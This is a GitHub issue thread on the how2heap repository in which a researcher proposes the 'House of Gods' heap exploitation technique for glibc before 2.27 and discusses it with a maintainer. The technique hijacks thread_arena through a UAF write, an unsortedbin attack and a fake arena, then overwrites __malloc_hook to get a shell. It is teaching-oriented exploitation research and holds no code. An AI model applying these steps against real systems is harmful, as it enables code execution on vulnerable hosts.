House of Gods - Githubissues

Milo-D commented 2 years ago

Hi all,

I was working on a new heap exploitation technique for older versions of glibc (< 2.27). House of Gods hijacks the thread_arena within only 8 allocations (9 if you allocate a separate chunk for the fake arena) and drops a shell after 10 allocations. It is suitable for scenarios where the attacker has only a single WAF on an unsorted chunk (and no WAF on fastchunks).

Exploit was tested against:

glibc 2.23
glibc 2.24
glibc 2.25
glibc 2.26 (no tcache)

I have yet to test it against the official ubuntu release, but this should not be a problem. If you are interested in a pull request, I will start preparing everything you need.

Very detailed paper: https://github.com/Milo-D/house-of-gods/blob/master/HOUSE_OF_GODS.TXT POC exploit: https://github.com/Milo-D/house-of-gods/blob/master/exploit.py

All other relevant files can be found here: https://github.com/Milo-D/house-of-gods/

Thanks for reading :)

Kyle-Kyle commented 2 years ago

Hi. Sorry for the late response and thank you for submitting the issue. I'll investigate this technique today.

Milo-D commented 2 years ago

Great, thank you :)

Kyle-Kyle commented 2 years ago

Let me repeat what the technique is about to make sure I understand it correctly:

it uses a UAF write bug to link the binmap-chunk into the unsorted bin list (requires known heap address for linking binmap-chunk, requires libc address for linking main_arena) . At this moment, the unsorted bin is corrupted because main_arena does not have correct bk or size
use fastbin pointers (by freeing fastbin chunks) in main_arena to forge bk and size and now the unsorted bin is kinda fixed
by abusing the hijacked linked list, we control main_arena->next
launch unsortedbin attack to overwrite narenas using exact fit (using the hijacked unsortedbin list). This will trick libc to think there are too many arenas and starts the arena resuing logic.
do malloc(<huge value>) twice to set next_to_use to a fake arena, and now we can perform allocation from the fake arena.
now allocate a fastbin from the fake arena to overwrite __malloc_hook

Kyle-Kyle commented 2 years ago

I think the technique is interesting, especially step 2. I have a question though: with step 1 & 2, which is using fastbin to fake an unsortedbin header inside main_arena, whether it is possible to allocate a chunk inside main_arena itself (using the UAF write in an unsorted bin). If it is possible, you can simply overwrite main_arena->top to get arbitrary write. Talking about faking valid header using fastbins, I think a few years ago, I have done it by just using fastbin UAF to fake a valid chunk inside main_arena->fastbinY. Allocating at that location and overwriting everything in it will give us "arbitrary" write primitive (ofc with valid size in header). But that's another technique. In fact, I think you should do the main_arena->top exploitation in your step 6 because fastbin requires 0x7f, which is not actually arbitrary write.

Kyle-Kyle commented 2 years ago

can you plz answer the question above (about whether it is possible to allocate a chunk inside main_arena using unsortedbin) ? thanks

Milo-D commented 2 years ago

Let me repeat what the technique is about to make sure I understand it correctly:

1. it uses a UAF write bug to link the `binmap-chunk` into the `unsorted bin` list (requires known heap address for linking `binmap-chunk`, requires libc address for linking `main_arena`) . At this moment, the unsorted bin is corrupted because `main_arena` does not have correct `bk` or `size`

2. use fastbin pointers (by freeing fastbin chunks) in `main_arena` to forge `bk` and `size` and now the unsorted bin is kinda fixed

3. by abusing the hijacked linked list, we control `main_arena->next`

4. launch unsortedbin attack to overwrite `narenas` using exact fit (using the hijacked unsortedbin list). This will trick libc to think there are too many arenas and starts the arena resuing logic.

5. do `malloc(<huge value>)` twice to set `next_to_use` to a fake arena, and now we can perform allocation from the fake arena.

6. now allocate a fastbin from the fake arena to overwrite `__malloc_hook`

Yep, everything correct.

In fact, I think you should do the main_arena->top exploitation in your step 6 because fastbin requires 0x7f, which is not actually arbitrary write.

Step 6 (or stage 3 in the paper) is actually just a small demonstration of how one could potentially abuse the hijacked arena in order to execute arbitrary code. So I picked the path of least resistance, which was to corrupt the fastbins. Allocating from the topchunk of a non-main-arena is not really arbitrary too, since the returned chunk must have the IS_MMAPD flag set, otherwise it would probably segfault. But maybe we could get around this limitation if we set the IS_MMAPD flag of the initial topchunk header. When malloc remainders the topchunk, it might also copy the IS_MMAPD flag of the initial header over to the new header. But I did not try this, there might be topchunk sanity checks against that.

But as for now, step 6 is meant to be a variable and replaceable part, since it is trivial to escalate to ACE once the arena is hijacked.

can you plz answer the question above (about whether it is possible to allocate a chunk inside main_arena using unsortedbin) ? thanks

Glad you asked :) That was actually my initial approach even before considering the main_arena.next pointer. Sadly, it did not work out. I don't remember the exact reason, but I think it had something to do with the have_fastchunks flag set, which would trigger a call to malloc_consolidate when trying to allocate the main_arena chunk as exact-fit (since a heap pointer is used as sizefield). Even if we remainder the main_arena chunk in order to avoid large memory requests (thus avoiding malloc_consolidate) malloc would probably still segfault in the unlink macro because of next_chunk(P)

Hope this answers your questions :)

Edit: Fixed a mistake.

Kyle-Kyle commented 2 years ago

Step 6 (or stage 3 in the paper) is actually just a small demonstration of how one could potentially abuse the hijacked arena in order to execute arbitrary code. So I picked the path of least resistance, which was to corrupt the fastbins. Allocating from the topchunk of a non-main-arena is not really arbitrary too, since the returned chunk must have the IS_MMAPD flag set, otherwise it would probably segfault. But maybe we could get around this limitation if we set the IS_MMAPD flag of the initial topchunk header. When malloc remainders the topchunk, it might also copy the IS_MMAPD flag of the initial header over to the new header. But I did not try this, there might be topchunk sanity checks against that.

That's right. Now the memory is coming back to me. A pointer is needed to serve as a valid size for the top chunk.

Sadly, it did not work out. I don't remember the exact reason, but I think it had something to do with the have_fastchunks flag set, which would trigger a call to malloc_consolidate when trying to allocate the main_arena chunk as exact-fit (since a heap pointer is used as sizefield).

I see. But I'm very curious on this. The issue here is that: 1. we use a pointer as size, which means that's a chunk with a huge size 2. you tried to do exact-fit, which means you probably tried to allocate a huge value, which triggers malloc_consolidate I have two potential solutions to allocate a chunk inside main_arena:

instead of doing an exact-fit, what if we just do a small allocation? Like, we allocate a small chunk (big enough to overwrite main_arena) out of this huge chunk?
what if we do a misaligned allocation? before 2.32, glibc allows returning a misaligned chunk. In this case, if the heap pointer is 0x55xxxxxxxxxx, we can misalign the pointer and use 0x55 as the size, which should be small enough to avoid malloc_consolidate.

If possible, can you verify whether either one works?

The reason why I'm asking this is that I think this technique is too complicated in its current form. I'd like to split it into two small atomic techniques: one doing allocation inside main_arena using unsorted bin, and the other is forced arena resuing. And I think the later may be still feasible in glibc-2.35 if combined with largebin-attack

Kyle-Kyle commented 2 years ago

I have another question, in your original example, you used non-pie binary, which means heap pointers are relatively small. Does it still work with PIE heap pointers? PIE heap pointers are larger and I wonder whether they can serve as valid chunk sizes.

Milo-D commented 2 years ago

1. instead of doing an exact-fit, what if we just do a small allocation? Like, we allocate a small chunk (big enough to 
overwrite `main_arena`) out of this huge chunk?

Nevertheless it would segfault due to next_chunk(P) within the unlink macro. Tried that a couple months ago ^^ sadly no success.

what if we do a misaligned allocation? before 2.32, glibc allows returning a misaligned chunk. In this case, if the heap pointer is 0x55xxxxxxxxxx, we can misalign the pointer and use 0x55 as the size, which should be small enough to avoid malloc_consolidate.

Misaligning the sizefield leads to misalignment in fd, bk, fd_nextsize and bk_nextsize of the main_arena chunk. Which in turn triggers failure within the unlinking process.

Edit: Actually option 2 would fail even before binning the main_arena chunk. It would not pass the unsorted-bin checks, due to misaligned bk.

Milo-D commented 2 years ago

I have another question, in your original example, you used non-pie binary, which means heap pointers are relatively small. Does it still work with PIE heap pointers? PIE heap pointers are larger and I wonder whether they can serve as valid chunk sizes.

It works with PIE binaries, too. We can set main_arena.system_mem to an arbitrary value, so the unsorted-bin checks are no problem for us, even with PIE heap pointers.

Kyle-Kyle commented 2 years ago

I like this technique a lot and I think it is very cool. It opens the door to exploiting arenas.

However, I'm a little hesitant about merging this because it gives me a feeling that it is an overkill: it requires a lot of primitives (heap leak, libc leak, UAF write, allocation of arbitrary size) and a restriction (UAF in unsorted bin and not fastbin). I'm thinking about whether it is possible to have simpler exploitation under the same setting. If there is none that is much simpler, I will happily merge it.

So, I wonder, since overwriting narenas requries unsortedbin attack, what if we use unsortedbin attack to hijack a fastbin? That will give us use after free in the fastbin and achieves the end goal of house of gods.

^ This approach requires heap leak, known target address (libc leak is not a hard dependency), UAF write, potentially not with allocation of arbitrary size

Milo-D commented 2 years ago

So, I wonder, since overwriting narenas requries unsortedbin attack, what if we use unsortedbin attack to hijack a fastbin? That will give us use after free in the fastbin and achieves the end goal of house of gods.

The end goal is not really to tamper with the fastbins but to hijack thread_arena ^^ Allocating from the fastbins of the fake-arena is only one of many options. House of Gods can be seen as a primitive to hijack thread_arena.

Sadly, I did not find any better way. I found an alternative way, but it required ~200 allocations (but did not need to make arbitrary requests) and was way more complex than this one.

I have worked on this type of technique mainly to discover new strategies, involving unusual/rare code paths. For example, there seems to be no technique which targets the process of arena switching...which is kinda sad, because it offers exploitable linked lists and zero glibc mitigations/security-checks :)

Carl-Be commented 1 year ago

because it offers exploitable linked lists and zero glibc mitigations/security-checks :)

Interesting I'm just starting my heap journey and this excites me!

Milo-D commented 1 year ago

because it offers exploitable linked lists and zero glibc mitigations/security-checks :)

Interesting I'm just starting my heap journey and this excites me!

Feel free to share your ideas, if you decide to look into this small subset of malloc :) Would be interesting to see more arena related techniques.

Milo-D commented 1 year ago

I like this technique a lot and I think it is very cool. It opens the door to exploiting arenas.

However, I'm a little hesitant about merging this because it gives me a feeling that it is an overkill: it requires a lot of primitives (heap leak, libc leak, UAF write, allocation of arbitrary size) and a restriction (UAF in unsorted bin and not fastbin). I'm thinking about whether it is possible to have simpler exploitation under the same setting. If there is none that is much simpler, I will happily merge it.

So, I wonder, since overwriting narenas requries unsortedbin attack, what if we use unsortedbin attack to hijack a fastbin? That will give us use after free in the fastbin and achieves the end goal of house of gods.

^ This approach requires heap leak, known target address (libc leak is not a hard dependency), UAF write, potentially not with allocation of arbitrary size

A simpler way I could think of would be to allocate an overlapping fastchunk (embedded into another, properly allocated chunk) from the unsorted bin by tampering with the bk of an unsorted chunk and then just free the fastchunk. This should allow one to UAF a fastchunk (---> fastbin attack) by writing to the previously used unsorted chunk.

But it would not make any use of the arena stuff. If the only goal of this repository is to drop a shell as fast and easy as possible, then this would probably be the way to go and "House of Gods" would be unnecessarily complicated. But if we want to demonstrate a broad spectrum of possible heap exploitation techniques, then, in my opinion, we should include this technique since it is distinct to other techniques and exploits unique targets (thread_arena, reused_arena() and in general the arena linked list) which are not covered by existing heap techniques. So while this technique might not be the simplest one, it might still raise people's awareness of the arena code in arena.c and maybe new and better ways to leverage this subset of malloc will follow.

This is only my opinion and I might be wrong with it. So I guess it is on you guys to decide :) In case you accept it, I will sit down and prepare a suitable proof of concept for this repository.

Thanks for reading.

Kyle-Kyle commented 1 year ago

I think you are right. The purpose of this repository is to teach and inspire more people to explore the art of heap exploitation instead of just serving as a collection of techniques. I'd be glad to merge it. But please explicitly mention the primitives needed for performing this technique in the documentation.

And I'm sorry for the delayed response.

Milo-D commented 1 year ago

Glad we agree.

I will prepare everything for the PR :)

Kyle-Kyle commented 1 year ago

thanks!

Kyle-Kyle commented 1 year ago

the 2.24 version of house-of-gods works so I tried to port it to 2.23. But it seems it stops working in 2.23 and the crash seems non-trivial, can you take a look at why the same exploit does not work in 2.23? (my guess is offset issues)

Milo-D commented 1 year ago

the 2.24 version of house-of-gods works so I tried to port it to 2.23. But it seems it stops working in 2.23 and the crash seems non-trivial, can you take a look at why the same exploit does not work in 2.23? (my guess is offset issues)

Yep, you might be right with the offsets. I hardcoded the distance between

unsorted-bin and narenas-0x10
unsorted-bin and binmap-chunk

The distance of (2) should be the same for 2.23 and 2.24 I guess. But (1) may vary across different libc versions.

I will take a closer look as soon as possible :)

Milo-D commented 1 year ago

Hi @Kyle-Kyle

I've recently uploaded the first revision of HoG and although very difficult to apply it might contain a somewhat interesting finding.

Take a look at the arena corruption capability at line 456 of the document.

A simple unsorted bin attack against the corruption bit effectively resets the state of the current arena, which allows one to restore broken/corrupted structures like bins and the heap in general. This primitive is also cheap and does not corrupt any structures.

The only requirements would be a WAF bug on an unsorted chunk and a libc leak. But it should be possible to perform a leakless variant by partially overwriting the bk pointer of a free'd unsorted chunk and guessing a nibble of ASLR entropy with a 1/16 chance.

What do you think ? Might not be relevant at all but I thought that this could be an interesting primitive :)

https://github.com/Milo-D/house-of-gods/blob/master/rev1/HOUSE_OF_GODS.TXT

Kyle-Kyle commented 1 year ago

it is good to know that this technique can be improved to need fewer primitives. It'd be great if you can 1. update the existing technique in the repo to only needing UAF write in an unsorted chunk and a libc leak and 2. add another variant that is leakless

Milo-D commented 1 year ago

it is good to know that this technique can be improved to need fewer primitives. It'd be great if you can 1. update the existing technique in the repo to only needing UAF write in an unsorted chunk and a libc leak and 2. add another variant that is leakless

Sorry for the confusion. I was not talking about an improvement of the previous technique. I wanted to discuss with you if it would make sense to add a primitive/idea of the alternative version of HoG to how2heap :) The idea is described at line 456 (corruption bit).

Kyle-Kyle commented 1 year ago

I think a technique variant is less interesting because the gist of the technique is already there unless it can achieve something very different.

Milo-D commented 1 year ago

Okay :) I think we can close this issue.

shellphish / how2heap

House of Gods #157